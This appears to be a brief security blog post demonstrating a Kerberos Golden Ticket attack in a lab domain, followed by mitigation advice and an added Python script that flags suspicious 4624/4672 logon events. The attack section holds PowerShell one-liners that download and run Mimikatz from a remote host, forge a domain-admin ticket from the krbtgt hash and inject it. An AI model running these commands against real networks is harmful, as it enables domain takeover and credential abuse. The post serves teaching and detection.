Golden Ticket Attack

Figure 1: Obtained Hash and SID
Figure 2: Failed Access
iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command '"kerberos::golden /admin:IDontExist23 /domain:plum.local /sid:S-1-5-21-XXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /krbtgt:<hash> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080"'
iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'
Figure 3: Created Golden Ticket
Figure 4: Injected Golden Ticket
Figure 5: Validated Access

Mitigation:

  • Reset the krbtgt password (twice) to invalidate current golden tickets
  • Review and filter Security Event IDs 4624 and 4672
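
One way to carry out that event review, as an added example that is not part of the original post: it pairs each 4624 logon with a 4672 event on the same logon ID and flags logons whose account name does not belong to the SID recorded in the event, the mismatch set up by the ticket above (name IDontExist23 with id 500). The field names are those of the 4624 and 4672 records; the domain SID, accounts, logon IDs and IP addresses are constructed, and the account inventory is an assumption.

```python
# Added example: correlate exported Security events 4624 (logon) and 4672
# (special privileges assigned). Every record below is a constructed sample.

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed placeholder

# Assumed inventory of real accounts (SID -> sAMAccountName), e.g. exported from AD.
KNOWN_ACCOUNTS = {
    f"{DOMAIN_SID}-500": "Administrator",
    f"{DOMAIN_SID}-1104": "jsmith",
}

SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "jsmith", "TargetUserSid": f"{DOMAIN_SID}-1104",
     "TargetLogonId": "0x3e1a2", "IpAddress": "10.0.0.15"},
    {"EventID": 4624, "TargetUserName": "Administrator", "TargetUserSid": f"{DOMAIN_SID}-500",
     "TargetLogonId": "0x4b210", "IpAddress": "10.0.0.20"},
    {"EventID": 4672, "SubjectUserName": "Administrator", "SubjectUserSid": f"{DOMAIN_SID}-500",
     "SubjectLogonId": "0x4b210"},
    {"EventID": 4624, "TargetUserName": "IDontExist23", "TargetUserSid": f"{DOMAIN_SID}-500",
     "TargetLogonId": "0x5c9f7", "IpAddress": "10.0.0.99"},
    {"EventID": 4672, "SubjectUserName": "IDontExist23", "SubjectUserSid": f"{DOMAIN_SID}-500",
     "SubjectLogonId": "0x5c9f7"},
]

def find_suspicious_logons(events, known_accounts):
    """Flag 4624 logons whose account name does not belong to the logged SID."""
    # Logon IDs that also received special privileges (4672) in the same session.
    privileged = {e["SubjectLogonId"] for e in events if e["EventID"] == 4672}
    findings = []
    for e in events:
        if e["EventID"] != 4624:
            continue
        owner = known_accounts.get(e["TargetUserSid"])
        if owner is None:
            reason = "SID not present in the account inventory"
        elif owner.lower() != e["TargetUserName"].lower():
            reason = f"account name does not match SID owner '{owner}'"
        else:
            continue  # name and SID agree: nothing to report
        findings.append({
            "user": e["TargetUserName"], "sid": e["TargetUserSid"],
            "logon_id": e["TargetLogonId"], "source_ip": e.get("IpAddress"),
            "privileged": e["TargetLogonId"] in privileged, "reason": reason,
        })
    return findings

if __name__ == "__main__":
    for finding in find_suspicious_logons(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(finding)
```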

Mike Bond

Cyber Security Enthusiast